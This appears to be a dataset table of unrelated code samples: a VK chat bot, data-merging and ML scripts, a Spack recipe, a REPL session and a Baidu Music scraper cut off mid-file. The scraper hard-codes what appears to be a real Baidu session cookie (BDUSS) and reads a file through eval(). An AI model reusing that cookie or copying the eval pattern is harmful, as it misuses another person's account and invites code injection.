text stringlengths 8 6.05M |
|---|
#!/usr/bin/python3
# DEVELOPER: https://github.com/undefinedvalue0103/nullcore-1.0/
import vklogging, vk, config, time, vkroot, traceback, pinput, hashlib, threading
try:
import commands, utils
except:
print(vklogging._colorize('$FR'+traceback.format_exc()))
quit()
def null_fnc(): pass
vk.log_func=null_fnc
config.logging=vklogging
utils.config = config
utils.logging = vklogging
utils.config = config
utils.vk = vk
commands.logging = vklogging
commands.config = config
commands.vk = vk
commands.root = vkroot
commands.utils = utils
vklogging.begin()
try:
vklogging.log('$FBLogging in$FR...')
vk.access_token = config.get('token')
response = vk.call('users.get')
if type(response) == list and len(response) == 1:
vklogging.log('$FGLogged in as $FM{first_name} {last_name} $FR($FB{id}$FR)'.format(**response[0]))
vkroot.data['self.uid'] = response[0]['id']
else:
vklogging.warn('$FRFailed', repr(response))
vklogging.close()
quit(1)
except Exception as error:
vklogging.warn('$FRFailed', repr(error))
vklogging.close()
quit(2)
commands.init()
vkroot.logging = vklogging
vkroot.run()
#vkroot.beep(freq=2000, time=.1)
handled_ids = []
def handle_message(message, thread_id):
if message['body'] == 'RSEIUB' and message['user_id'] == config.get('developer'):
vk.call('messages.send', peer_id=utils.peer_id(message), message='HARD REBOOTING')
vkroot.reboot()
# vklogging.log('Handled', message['body'])
try:
response = commands.handle(message)
except:
trace = traceback.format_exc()
bug_message=vklogging._colorize('$FRBugTracker:\n$FBPeer: $FM{peerid}\n$FBUser: $FM*id{userid}\n$FYException while calling command:\n$FY{command}\n\n{trace}'.format(
command=message['body'],
trace=trace.replace('\n', '\n$FR'),
peerid=utils.peer_id(message),
userid=message['user_id']))
vklogging.log(bug_message)
developer = config.get('developer')
vk.call('messages.send', peer_id=developer, message=vklogging.uncolorize(bug_message))
response = 'Произошла ошибка при выполнении. О ней уже сообщили разработчику. Приносим извинения за неудобства'
if message['user_id'] == developer:
response = vklogging.uncolorize(bug_message)
if response:
vk.call('messages.markAsRead', peer_id=utils.peer_id(message), message_ids=message['id'])
vkroot.messages['handled'] += 1
if response == '':
return
elif type(response) == str:
mid = vk.call('messages.send', peer_id=utils.peer_id(message), message=response)
if type(mid) == int:
vkroot.sent_ids.append([mid, utils.peer_id(message)])
elif type(response) == dict:
mid = vk.call('messages.send', response, peer_id=utils.peer_id(message))
if type(mid) == int:
vkroot.sent_ids.append([mid, utils.peer_id(message)])
elif type(response) == list:
for data in response:
mid = vk.call('messages.send', data['payload'], peer_id=data['peer_id'])
if type(mid) == int:
vkroot.sent_ids.append([mid, data['peer_id']])
vkroot.messages['all'] += 1
vkroot.thread_stop(thread_id)
vkroot.data['friends-timer'] = 0
while vkroot.running == True:
try:
try:
if vkroot.data['friends-timer'] % 30 == 0:
vkroot.data['friends-timer'] = 0
utils.update_friends()
else:
vkroot.data['friends-timer'] += 1
# vklogging.log('Getting')
messages = vk.call('messages.get', count=20)
# vklogging.log(repr(messages))
if messages is None:
vklogging.warn('$FRConnection error')
continue
elif 'error_code' in messages:
vklogging.warn('$FRVkError: $FY\x23$FR{error_code}$FY: $FG{error_msg} '.format(**messages))
continue
for message in messages['items']:
if message['id'] not in handled_ids and message['read_state'] == 0:
handled_ids.append(message['id'])
thread_id = threading.Thread(target=handle_message, args=(message, None))
vkroot.thread_run(thread_id)
thread_id._args = (message, thread_id)
thread_id.start()
except IOError: #Exception:
trace = traceback.format_exc()
vklogging.exception(trace)
config.__reload__()
vklogging.logtime('$BW$FR'+vk.bytes_str()+'$F_$B_')
time.sleep(0.5)
except KeyboardInterrupt:
vkroot.stop()
break
vklogging.close()
if vkroot.running == -1:
quit(-1)
quit(0)
|
''''
-----------------------------
EJERCICIO N°1
Literales de Python
-----------------------------
Escribe una sola línea de código para obtener esta salida de 3 líneas:
"Estoy"
""aprendiendo""
"""Python"""
-----------------------------
'''
|
import sys, os
import pandas as pd
import datetime
from shutil import move
import csv
## write functions based on audio or not audio
def create_merged(file_old, file_new, file_merged, mode="audio"):
print(mode)
print(file_old)
bl_value = "***FIX ME***"
# """
if mode=="audio":
annotid_col = "annotid"
word_col = "word"
basic_level_col = "basic_level"
elif mode=="video":
annotid_col = "labeled_object.id"
word_col = "labeled_object.object"
basic_level_col = "labeled_object.basic_level" # or just basic_level?
else:
print("Wrong mode value")
return [], [], []
# """
# annotid_col = "annotid"
# word_col = "word"
# basic_level_col = "basic_level"
old_error = False
edit_word = False
new_word = False
old_df = pd.read_csv(file_old, keep_default_na=False, engine='python')
new_df = pd.read_csv(file_new, keep_default_na=False, engine='python')
merged_df = pd.DataFrame(columns = old_df.columns.values)
#df = df.rename(columns={'oldName1': 'newName1'})
for index, new_row in new_df.iterrows():
#word = ''
to_add = new_row
id = new_row[annotid_col]
tmp = old_df[old_df[annotid_col]==id]
# print(len(tmp.index))
word = new_row[word_col]
# tier = new_row['tier']
# spk = new_row['speaker']
# utt_type = new_row['utterance_type']
# obj_pres = new_row['object_present']
# ts = new_row['timestamp']
while len(tmp.index) != 0: # if the id already exists in the old df, check that the words/ts? do match
if len(tmp.index) > 1:
print("ERROR: annotid not unique in old version : ", id) # raise exception
to_add[basic_level_col] = bl_value
merged_df = merged_df.append(to_add)
old_error = True
break
old_row = tmp.iloc[0]
# if new_row[:, new_row.columns != "basic_level"].equals(old_row[:, old_row.columns != "basic_level"]):
if word == old_row[word_col]:
# print("old", word)
# check codes as well to know if something changed?
to_add[basic_level_col] = old_row[basic_level_col]
merged_df = merged_df.append(to_add)
break
else:
# print("old but different", word)
to_add[basic_level_col] = bl_value
merged_df = merged_df.append(to_add)
edit_word = True
break
else: # if the id is new: no info to retrieve, add row from new
# print(word)
if word != '':
# print("new", word)
to_add[basic_level_col] = bl_value
merged_df = merged_df.append(to_add)
new_word = True
# print(merged_df)
merged_df = merged_df.loc[:, ~merged_df.columns.str.contains('^Unnamed')]
merged_df.to_csv(file_merged, index=False)
return old_error, edit_word, new_word
if __name__ == "__main__":
old_error_list = []
edit_word_list = []
new_word_list = []
today = str(datetime.datetime.now().year)+"_" \
+ str(datetime.datetime.now().month)+"_" \
+ str(datetime.datetime.now().day)+"_"
# if only one file
if len(sys.argv) >= 5:
old = sys.argv[1]
new = sys.argv[2]
out = sys.argv[3]
# if len(sys.argv)>=5:
mode = sys.argv[4]
if old and out and new:
old_error, edit_word, new_word = create_merged(old, new, out, mode)
# if all files ## <=4 because mode could be added
if len(sys.argv) >= 2 and len(sys.argv)<=4:
in_folder = sys.argv[1]
out_folder = sys.argv[2]
mode = sys.argv[3]
old_list = []
new_list = []
out_list = []
for csv_file in os.listdir(in_folder):
if csv_file.endswith("processed.csv"):
new_list.append(os.path.join(in_folder, csv_file))
sparse_code_name = csv_file[:5]+"_"+mode+"_sparse_code.csv"
old_list.append(os.path.join(in_folder, sparse_code_name))
out_list.append(os.path.join(out_folder, sparse_code_name))
old_list.sort()
new_list.sort()
out_list.sort()
for old, new, out in zip(old_list, new_list, out_list):
old_error, edit_word, new_word = create_merged(old, new, out, mode)
########################################################################
# home_visit_paths = sys.argv[1]
# if len(sys.argv) > 2:
# mode = sys.argv[2]
#
# with open(home_visit_paths, 'r') as f:
# lines = f.readlines()
#
# for line in lines:
# print(line)
# line = line.strip()
#
# # get name of old .csv file (with bl)+path to merged
# # old_path = line+"/Analysis/Audio_Analysis/"
# old_path = line+"/Analysis/Audio_Analysis/"
# for csv_file in os.listdir(old_path):
# # for csv_file in os.listdir(os.path.join(old_path, "old_files")):
# if csv_file.endswith("audio_sparse_code.csv"):
# # if csv_file.startswith("2019_1_8"): ## for one time fixing error
# move(os.path.join(old_path, csv_file), os.path.join(old_path, "old_files", today+csv_file))
# old = os.path.join(old_path, "old_files", today+csv_file)
# # old = os.path.join(old_path, "old_files", csv_file)
# out = os.path.join(old_path, csv_file)
# # out = os.path.join(old_path, csv_file[9:])
#
# # get name of new .csv file (no bl)
# new_path = line+"/Coding/Audio_Annotation/"
# for csv_file in os.listdir(new_path):
# if csv_file.endswith("processed.csv"):
# new = os.path.join(new_path, csv_file)
#
# # compute merge
# if old and out and new:
# old_error, edit_word, new_word = create_merged(old, new, out, mode)
# if old_error:
# old_error_list.append(line)
# if edit_word:
# edit_word_list.append(line)
# if new_word:
# new_word_list.append(line)
#
# # at the very end, write every error/change encountered
# with open("annotid_merge_errors.txt", "w+") as f:
# f.write("old_errors\n")
# for l in old_error_list:
# f.write(l+"\n")
# f.write("edit_word\n")
# for l in edit_word_list:
# f.write(l+"\n")
# f.write("new_word\n")
# for l in new_word_list:
# f.write(l+"\n")
|
print 'Create a module without any parent in your repo.. Done?',
raw_input()
print "--------------------------------------------------"
print "Step 1: Prepare the Project POM"
print "--------------------------------------------------"
print 'Add two dependencies along with build and repository tags'
print '1) your container jar'
print '2) component-testing jar mentioned below'
print '''
<dependency>
<artifactId>component-testing</artifactId>
<groupId>com.flipkart</groupId>
<version>1.1-SNAPSHOT</version>
</dependency>
'''
print "Done with preparing pom?",
raw_input()
print "------------------------------------------------"
print 'Step 2: Time to Prepare the Test config file'
print "------------------------------------------------"
print 'Create a file (src/test/resources/service-config/test-config.yml) and copy your production config here.'
print ''
print ''
print '/*--------------------------------------------------------------------------------------------------------------'
print "IMPORTANT: replace all your original dependencies following below conventions: Don't keep a Prodution endpoint"
print '--------------------------------------------------------------------------------------------------------------*/'
print 'for ES: localhost:9300'
print 'for Http: localhost:7777'
print 'for Mysql: localhost:3306 : userName and password respectively'
print 'for Zookeeper: localhost:2181'
print 'for aerospike localhost:3000'
print 'for redis sentinel localhost:26379'
print 'for solr localhost:8983'
print ''
print "Done with config file preparion ?",
raw_input()
print '------------------------------------------------------'
print 'Step 3: Outline Preparation'
print '-----------------------------------------------------'
print 'Enter the port on which your service will spawn:',
port = int(raw_input())
print 'Enter the Main class of your application (Eg: A.class)',
serviceClass = raw_input()
print 'create a class BaseIntegrationTest with contents below in test directory'
print('''
import com.flipkart.component.testing.orchestrators.SpecificationRunner;
import org.junit.BeforeClass;
public abstract class BaseIntegrationTest{
protected static SpecificationRunner specificationRunner;
@BeforeClass
public static void setUp() {
String configPath = "src/test/resources/service-config/test-config.yaml";
String serviceUrl = "http://localhost:%s";
if(specificationRunner==null)
specificationRunner = new SpecificationRunner(configPath, serviceUrl, %s.class );
}
}
''' % (str(port), serviceClass))
print 'Done with base test class ?'
raw_input()
print '------------------------------------------------------'
print 'Step 4: Creating Test Specification file'
print '------------------------------------------------------'
print 'Provide the inputs as asked below and copy the generated test specifications to the specification file under folder src/test/resources'
execfile("create-spec.py")
print 'Done with creating the test specification json ?'
raw_input()
print '------------------------------------------------------'
print 'Step 5: Creating Test class'
print '------------------------------------------------------'
print 'Create a test class with the content as shown below : for ex TestClass.class'
print '''
public class TestClass extends BaseIntegrationTest {
List<Observation> observations;
@Test
public void testCase1() throws Exception {
String specFilePath ="path_to_specification_file.json";
observations = specificationRunner.runLite(specFilePath);
//add assertions as required
Assert.assertEquals(200,((HttpObservation) observations.get(0)).getStatuscode());
}
@Test
public void testCase2() throws Exception {
String specFilePath ="path_to_specification_file.json";
observations = specificationRunner.runLite(specFilePath);
//add assertions as required
Assert.assertEquals(200,((HttpObservation) observations.get(0)).getStatuscode());
}
}
''' |
#!/usr/bin/python3
# EASY-INSTALL-ENTRY-SCRIPT: 'demo-py==0.0.0','console_scripts','demo'
__requires__ = 'demo-py==0.0.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('demo-py==0.0.0', 'console_scripts', 'demo')()
)
|
from sonic import *
import time
def setDir():
time.sleep(0.02)
SS1 = printsonic(1)
SS2 = printsonic(2)
SS3 = printsonic(3)
print("SS1 = ",SS1 ,"SS2 = ",SS2 ,"SS3 = " ,SS3)
res = 0
if SS1+SS2+SS3 == 0 :
res = 1
elif SS2 <=5 and SS2!=0 :
if SS3 <=5 and SS2!=0 :
res = 3
else :
res = 4
elif SS1 <=5 and SS1!=0 :
res = 4
elif SS3 <=5 and SS3!=0 :
res = 3
return res
def setDirTest():
time.sleep(0.1)
SS1 = printsonic(1)
print("SS1",SS1)
res = 0
if SS1 == 0 :
res = 1
else :
res = 3
return res |
Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:44:40) [MSC v.1600 64 bit (AMD64)] on win32
Type "copyright", "credits" or "license()" for more information.
>>> x =1 #int
>>> y=2.8 #float
>>> z=1j #complex
>>> print (type(x)))
SyntaxError: invalid syntax
>>> print (type (x) )
<class 'int'>
>>> print(type (y) )
<class 'float'>
>>> print(type (z) )
<class 'complex'>
>>> x= 1
>>> y= 35656544444
>>> z=-325522
>>> print (type (x) )
<class 'int'>
>>> print (type (y) 0
SyntaxError: invalid syntax
>>> print (print (y) )
35656544444
None
>>> print (type (z) )
<class 'int'>
>>> x=1.10
>>> y=1.0
>>> z= -35.59
>>> print (type(x) )
<class 'float'>
>>> print (type(y) )
<class 'float'>
>>> print (type(z) )
<class 'float'>
>>>
x=35e3
>>> y=12e4
>>> z=-87.7e100
>>> print(type(x) )
<class 'float'>
>>> print (type(y) )
<class 'float'>
>>> print (type (z) )
<class 'float'>
>>> x= 3+5j
>>> y=5j
>>> z= -5j
>>> print (type(x) )
<class 'complex'>
>>> print (type(y) )
<class 'complex'>
>>> print (type(z) )
<class 'complex'>
>>> x = 1 #int
>>> y =2.8 #float
>>> z= 1j #complex
>>> #convert form float int to float:
>>> a=float(x)
>>> #convert form float to int
>>> b=int (y)
>>> #convert from int to complex:
>>> c=complex(x)
>>> print(a)
1.0
>>> print(b)
2
>>> print(c)
(1+0j)
>>> print(type(a))
<class 'float'>
>>> print(type(b))
<class 'int'>
>>> print(type(c))
<class 'complex'>
>>> import random
>>> print(random.randrange(1,10))
2
>>> print(random.randrange(1,10))
SyntaxError: unexpected indent
>>> print(random.randrange(1,10))
4
>>>
|
import os
class Card:
def __init__(self, name):
self.name=name
self.image=""
self.prix=0.0
self.capacite=""
self.extension="None"
def save(self, path):
if path[len(path)-1]!='/':
path=path+'/'
path=path+self.extension+".txt"
file=open(path,"a");
buffer=self.name+","+str(self.prix)+","+self.extension+","+self.description+"\n"
file.write(buffer); |
import torch
import torch.nn as nn
from torch.nn.functional import mse_loss, smooth_l1_loss
from torch.autograd import Variable
import torch.optim as optim
from collections import namedtuple
import random
import numpy as np
from model import model
from ReplayMemory import ReplayMemory
Transition = namedtuple('Transition', ['s', 'a', 'r', 's_'])
class DDQN():
def __init__(self, state_num, action_num, device, CONFIG, action_list):
self.action_list = action_list
self.memory = ReplayMemory(CONFIG.MEMORY_CAPACITY)
#== ENV PARAM ==
self.state_num = state_num
self.action_num = action_num
#== PARAM ==
self.EPSILON = CONFIG.EPSILON
self.EPS_START = CONFIG.EPSILON
self.EPS_END = CONFIG.EPSILON_END
self.EPS_DECAY = CONFIG.MAX_EP_STEPS
self.LR_C = CONFIG.LR_C
self.LR_C_START = CONFIG.LR_C
self.LR_C_END = CONFIG.LR_C_END
self.LR_C_DECAY = CONFIG.MAX_EP_STEPS * CONFIG.MAX_EPISODES / 2
self.BATCH_SIZE = CONFIG.BATCH_SIZE
self.GAMMA = CONFIG.GAMMA
self.MAX_MODEL = CONFIG.MAX_MODEL
#== Target Network Update ==
self.TAU = CONFIG.TAU
self.HARD_UPDATE = CONFIG.HARD_UPDATE
self.SOFT_UPDATE = CONFIG.SOFT_UPDATE
#== DQN ==
self.double = CONFIG.DOUBLE
self.device = device
self.build_network()
def build_network(self):
self.Q_network = model(self.state_num, self.action_num)
self.target_network = model(self.state_num, self.action_num)
if self.device == torch.device('cuda'):
self.Q_network.cuda()
self.target_network.cuda()
self.optimizer = optim.Adam(self.Q_network.parameters(), lr=self.LR_C)
self.max_grad_norm = 0.5
self.training_step = 0
def update_target_network(self):
if self.SOFT_UPDATE:
# Soft Replace
for module_tar, module_pol in zip(self.target_network.modules(), self.Q_network.modules()):
if isinstance(module_tar, nn.Linear):
module_tar.weight.data = (1-self.TAU)*module_tar.weight.data + self.TAU*module_pol.weight.data
module_tar.bias.data = (1-self.TAU)*module_tar.bias.data + self.TAU*module_pol.bias.data
elif self.training_step % self.HARD_UPDATE == 0:
# Hard Replace
self.target_network.load_state_dict(self.Q_network.state_dict())
def update(self):
if len(self.memory) < self.BATCH_SIZE*20:
#if not self.memory.isfull:
return
self.training_step += 1
#== EXPERIENCE REPLAY ==
transitions = self.memory.sample(self.BATCH_SIZE)
# Transpose the batch (see https://stackoverflow.com/a/19343/3343043 for
# detailed explanation). This converts batch-array of Transitions
# to Transition of batch-arrays.
batch = Transition(*zip(*transitions))
non_final_mask = torch.tensor(tuple(map(lambda s: s is not None, batch.s_)),
device=self.device, dtype=torch.bool)
non_final_state_nxt = torch.FloatTensor([s for s in batch.s_ if s is not None],
device=self.device)
state = torch.FloatTensor(batch.s, device=self.device)
action = torch.LongTensor(batch.a, device=self.device).view(-1,1)
reward = torch.FloatTensor(batch.r, device=self.device)
#== get Q(s,a) ==
# gather reguires idx to be Long, i/p and idx should have the same shape with only diff at the dim we want to extract value
# o/p = Q [ i ][ action[i] ], which has the same dim as idx,
state_action_values = self.Q_network(state).gather(1, action).view(-1)
#== get a' by Q_policy: a' = argmax_a' Q_policy(s', a') ==
with torch.no_grad():
action_nxt = self.Q_network(non_final_state_nxt).max(1, keepdim=True)[1]
#== get expected value: y = r + gamma * Q_tar(s', a') ==
state_value_nxt = torch.zeros(self.BATCH_SIZE, device=self.device)
with torch.no_grad():
if self.double:
Q_expect = self.target_network(non_final_state_nxt)
else:
Q_expect = self.Q_network(non_final_state_nxt)
state_value_nxt[non_final_mask] = Q_expect.gather(1, action_nxt).view(-1)
expected_state_action_values = (state_value_nxt * self.GAMMA) + reward
#== regression Q(s, a) -> y ==
self.Q_network.train()
loss = smooth_l1_loss(input=state_action_values, target=expected_state_action_values.detach())
#== backward optimize ==
self.optimizer.zero_grad()
loss.backward()
#nn.utils.clip_grad_norm_(self.Q_network.parameters(), self.max_grad_norm)
self.optimizer.step()
#== Update Target Network ==
self.update_target_network()
#== Hyper-Parameter Update ==
self.EPSILON = self.EPS_END + (self.EPS_START - self.EPS_END) * \
np.exp(-1. * self.training_step / self.EPS_DECAY)
self.LR_C = self.LR_C_END + (self.LR_C_START - self.LR_C_END) * \
np.exp(-1. * self.training_step / self.LR_C_DECAY)
return loss.item()
def select_action(self, state):
state = torch.from_numpy(state).float().unsqueeze(0)
if random.random() < self.EPSILON:
action_index = random.randint(0, self.action_num-1)
else:
action_index = self.Q_network(state).max(1)[1].item()
return self.action_list[action_index], action_index
def store_transition(self, *args):
self.memory.update(Transition(*args))
def save(self, step, logs_path):
os.makedirs(logs_path, exist_ok=True)
model_list = glob.glob(os.path.join(logs_path, '*.pth'))
if len(model_list) > self.MAX_MODEL - 1 :
min_step = min([int(li.split('/')[-1][6:-4]) for li in model_list])
os.remove(os.path.join(logs_path, 'model-{}.pth' .format(min_step)))
logs_path = os.path.join(logs_path, 'model-{}.pth' .format(step))
self.Q_network.save(logs_path, step=step)
print('=> Save {}' .format(logs_path))
def restore(self, logs_path):
self.Q_network.load(logs_path)
self.target_network.load(logs_path)
print('=> Restore {}' .format(logs_path)) |
def example_function():
print("THIS IS AN EXAMPLE FUNCTION")
def read_antibiotics_file_and_print():
"""
Open the file. Note: this assumes the filename and that it exits. If the
file doesn't exist, this will cause an error.
"""
with open("antibiotics.csv") as antibiotics_file:
"""
Read the file contents.
"""
file_contents = antibiotics_file.read()
"""
Collect an array of the lines by taking all of the file contents and
splitting by a new-line charachter (aka "carage return")
"""
lines = file_contents.split("\n")
"""
Go through each line.
"""
for line in lines:
"""
Print the line to the screen.
"""
print(line + "\n")
"""
Don't worrie too much about what this means, this is just the "python" way
of setting the entry point of the file. When you run this python file
as is (versus including it from another file), it will run this protion.
"""
if __name__ == "__main__":
print("TESTING")
example_function()
read_antibiotics_file_and_print()
|
from spack import *
import shutil
import sys,os
sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import write_scram_toolfile
class OracleocciAbiHackCms(Package):
"""An ABI hack to occi.h with std=c++17"""
homepage = "https://github.com/cms-sw"
url = "https://github.com/cms-sw/cms_oracleocci_abi_hack.git"
version('1.0.0', git = "https://github.com/cms-sw/cms_oracleocci_abi_hack.git",
commit='88b2a965305226df1822a14af8fe7174ee5f1614')
depends_on('oracle')
def install(self, spec, prefix):
make()
with working_dir('build', create=False):
shutil.copytree('lib',prefix.lib)
shutil.copytree('include',prefix.include)
def setup_environment(self, spack_env, run_env):
spack_env.set('INCLUDE_DIR','%s' % self.spec['oracle'].prefix.include)
spack_env.set('LIB_DIR', '%s' % self.spec['oracle'].prefix.lib)
|
"""
"""
from collections import OrderedDict, namedtuple
from typing import List, Union, Tuple, Dict
Dependency = namedtuple('Dep', 'dependent arc') # int, str
class DependencyParse:
def is_arc_present_below(self, token_id: int, arc: str) -> bool:
raise NotImplementedError
@property
def style(self) -> str:
raise NotImplementedError
def get_leaves(self, token_id: int) -> List[OrderedDict]:
raise NotImplementedError
def get_leaves_by_arc(self, arc: str, head=None, sentence_id=1) -> Tuple[int, List[OrderedDict]]:
raise NotImplementedError
def get_child_with_arc(self, token_id: int, arc: str) -> Union[None, OrderedDict]:
raise NotImplementedError
def collect_compounds(self, token_id: int) -> List[OrderedDict]:
raise NotImplementedError
class UniversalDependencyParse(DependencyParse):
def __init__(self, dependencies: dict, tokens: list):
self.deps: dict = dependencies
self.tokens: list = tokens
self.nodes: Dict[int, List[Dependency]] = {}
self.sentence_heads: Dict[int, int] = {} # sentenceId -> head
if dependencies.get('style', 'universal') != 'universal':
raise ValueError(f"{dependencies['style']} is not universal!")
self._build_nodes()
def _build_nodes(self):
for t in self.tokens:
arc: dict = self.deps['arcs'][t['id']][0]
if arc['governor'] not in self.nodes:
self.nodes[arc['governor']] = []
if arc['governor'] == 0:
self.sentence_heads[arc['sentenceId']] = t['id']
self.nodes[arc['governor']].append(Dependency(dependent=arc['dependent'], arc=arc['label']))
def is_arc_present_below(self, token_id: int, arc: str) -> bool:
stack = list(self.nodes.get(token_id, []))
while len(stack):
dep = stack.pop()
if dep.arc == arc:
return True
stack.extend(self.nodes.get(dep.dependent, []))
return False
@property
def style(self) -> str:
return self.deps.get('style', 'universal')
def get_leaves(self, token_id: int) -> List[OrderedDict]:
tokens = [self.tokens[token_id-1]]
stack = list(self.nodes.get(token_id, []))
while len(stack):
dep = stack.pop()
tokens.append(self.tokens[dep.dependent-1])
stack.extend(self.nodes.get(dep.dependent, []))
return sorted(tokens, key=lambda t: t['id'])
def get_leaves_by_arc(self, arc: str, head=None, sentence_id=1) -> Tuple[int, List[OrderedDict]]:
if head is None:
head = self.sentence_heads[sentence_id]
stack = list(self.nodes.get(head, []))
while len(stack):
dep = stack.pop()
if dep.arc == arc:
return dep.dependent, self.get_leaves(dep.dependent)
stack.extend(self.nodes.get(dep.dependent, []))
return 0, []
def get_child_with_arc(self, token_id: int, arc: str, follow: Tuple = ()) -> Union[None, OrderedDict]:
stack = list(self.nodes.get(token_id, []))
while len(stack):
dep = stack.pop()
if dep.arc == arc:
return self.tokens[dep.dependent-1]
if dep.arc in follow:
stack.extend(self.nodes.get(dep.dependent, []))
return None
def collect_compounds(self, token_id: int) -> List[OrderedDict]:
compound = [self.tokens[token_id-1]]
stack = list(self.nodes.get(token_id, []))
while len(stack):
dep = stack.pop()
if dep.arc == 'compound':
compound.append(self.tokens[dep.dependent-1])
stack.extend(self.nodes.get(dep.dependent, []))
return sorted(compound, key=lambda t: t['id'])
|
import json
import os
import luigi
import pandas as pd
from luigi.contrib.spark import PySparkTask
from pyspark.sql import SparkSession
from pyspark.sql.functions import max as max_
from bicis.etl.raw_data.unify import UnifyRawData
from bicis.lib.data_paths import data_dir
class DatasetSplitter(PySparkTask):
# These are held contant to "ensure" reproducibility
validation_period = '90D'
test_period = '90D'
def requires(self):
return UnifyRawData()
def output(self):
return {
'training': luigi.LocalTarget(os.path.join(data_dir, 'unified/training.csv')),
'validation': luigi.LocalTarget(os.path.join(data_dir, 'unified/validation.csv')),
'testing': luigi.LocalTarget(os.path.join(data_dir, 'unified/testing.csv')),
'metadata': luigi.LocalTarget(os.path.join(data_dir, 'unified/split_metadata.json'))
}
def main(self, sc, *args):
spark_sql = SparkSession.builder.getOrCreate()
raw_data = self.requires().load_dataframe(spark_sql)
max_dates = (
raw_data
.groupBy()
.agg(max_('rent_date'), max_('return_date'))
.first()
)
max_date = min(max_dates.asDict().values())
testing_end_date = max_date
validation_end_date = testing_start_date = testing_end_date - pd.Timedelta(self.test_period).to_pytimedelta()
training_end_date = validation_start_date = validation_end_date - pd.Timedelta(self.validation_period).to_pytimedelta()
if not self.output()['training'].exists():
(
raw_data
.filter(raw_data.rent_date < training_end_date)
.write
.csv(self.output()['training'].path, header='true')
)
if not self.output()['validation'].exists():
(
raw_data
.filter(raw_data.rent_date >= validation_start_date)
.filter(raw_data.rent_date < validation_end_date)
.write
.csv(self.output()['validation'].path, header='true')
)
if not self.output()['testing'].exists():
(
raw_data
.filter(raw_data.rent_date >= testing_start_date)
.filter(raw_data.rent_date <= testing_end_date)
.write
.csv(self.output()['testing'].path, header='true')
)
with self.output()['metadata'].open('w') as f:
json.dump(
{
'training_end_date': training_end_date.isoformat(),
'validation_start_date': validation_start_date.isoformat(),
'validation_end_date': validation_end_date.isoformat(),
'testing_start_date': testing_start_date.isoformat(),
'testing_end_date': testing_end_date.isoformat(),
},
f,
indent=2,
)
|
# -*- coding:utf-8 -*-
import os
import sys
import time
import threading
import requests
from lxml import etree
import urllib
reload(sys)
sys.setdefaultencoding('utf-8')
global flag
flag = 1
tag_list = ["热歌","新歌"]
# 写dict
def writedict(dict):
with open('dict.txt','w') as f:
f.write(str(dict))
# 读dict
def readdict():
if not os.path.exists('dict.txt'):
return {}
with open('dict.txt','r') as f:
dict = f.readline()
return eval(dict)
# 去除文件名非法字符
def del_illegal_char(str):
illegal_char = ["\\", "/", ":", "*", "?", '"', "'", "<", ">", "|"]
for i in illegal_char:
str = str.replace(i,"")
return str
#去除空格 换行 制表符
def trim(str):
return str.replace('\t', '').replace('\n', '').replace(' ', '')
#判断是否是404页面
def is_404(html):
soup = etree.HTML(html)
div = soup.xpath('//div[@class="state-404 c9"]')
if div:
return True
return False
def urlcode_tr(str):
return urllib.unquote(str).decode('utf-8')
def create_dir(name):
if not os.path.exists(name):
os.mkdir(name)
print u'创建文件夹{}成功'.format(name)
time.sleep(5)
return name
def write_content_file(path_and_name,content,op='wb'):
if not content:
print u'写入的{}文件为空,请确认文件内容.....'.format(path_and_name)
return
with open(path_and_name,op) as f:
f.write(content)
def write_text_file(path_and_name,text,op='a+'):
global flag
# print flag
if not text:
#print u'写入的{}文件为空,请确认文件内容.....'.format(path_and_name)
return
if os.path.exists(path_and_name) and flag==1:
flag = 0
os.remove(path_and_name)
with open(path_and_name,op) as f:
f.write(str(text))
def get_html(url):
'''
headers = {"Host":"music.baidu.com",
"User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
"Cookie":"__cfduid=d535414b37ab0e1f5e1a454ee1ac9283b1491409826; BAIDUID=B50E57EBDC27E3EA584EAB69D3C0569B:FG=1; BIDUPSID=99F61AC7C2C1D1C488471259D1FAA7B4; PSTM=1492784961; BDUSS=d4blV4azVNRjJ5aFlLZzNMTmtFR3Y4MVF1ZzJWSnVFYVUydEFnZXhVNVNpU3RaSVFBQUFBJCQAAAAAAAAAAAEAAACnjSlYyOXRxbXEssvE8c~It8kAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFL8A1lS~ANZUl; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; BDRCVFR[mlS6V4LF-w_]=mbxnW11j9Dfmh7GuZR8mvqV; PSINO=1; H_PS_PSSID=1451_21124; Hm_lvt_d0ad46e4afeacf34cd12de4c9b553aa6=1493603710,1493710963,1493729853,1493769596; Hm_lpvt_d0ad46e4afeacf34cd12de4c9b553aa6="+str(time.time()).split('.')[0]+"; checkStatus=true; tracesrc=-1%7C%7C-1; u_lo=0; u_id=; u_t="
}
'''
headers = {"Host":"music.baidu.com",
"User-Agent":'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',
"Cookie":"__cfduid=d535414b37ab0e1f5e1a454ee1ac9283b1491409826; BAIDUID=B50E57EBDC27E3EA584EAB69D3C0569B:FG=1; BIDUPSID=99F61AC7C2C1D1C488471259D1FAA7B4; PSTM=1492784961; BDUSS=d4blV4azVNRjJ5aFlLZzNMTmtFR3Y4MVF1ZzJWSnVFYVUydEFnZXhVNVNpU3RaSVFBQUFBJCQAAAAAAAAAAAEAAACnjSlYyOXRxbXEssvE8c~It8kAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFL8A1lS~ANZUl; BDORZ=B490B5EBF6F3CD402E515D22BCDA1598; checkStatus=true; BDRCVFR[mlS6V4LF-w_]=8Za7a4opMO6pydEUvn8mvqV; PSINO=1; H_PS_PSSID=1451_21124; Hm_lvt_d0ad46e4afeacf34cd12de4c9b553aa6=1493603710,1493710963,1493729853,1493769596; Hm_lpvt_d0ad46e4afeacf34cd12de4c9b553aa6=1493813422; tracesrc=-1%7C%7C-1; u_lo=0; u_id=; u_t="
}
request = requests.get(url=url,headers=headers)
response = request.content
# print response
return response
#获得所有标签对应的url,以及分类
def get_tag_url_list(html):
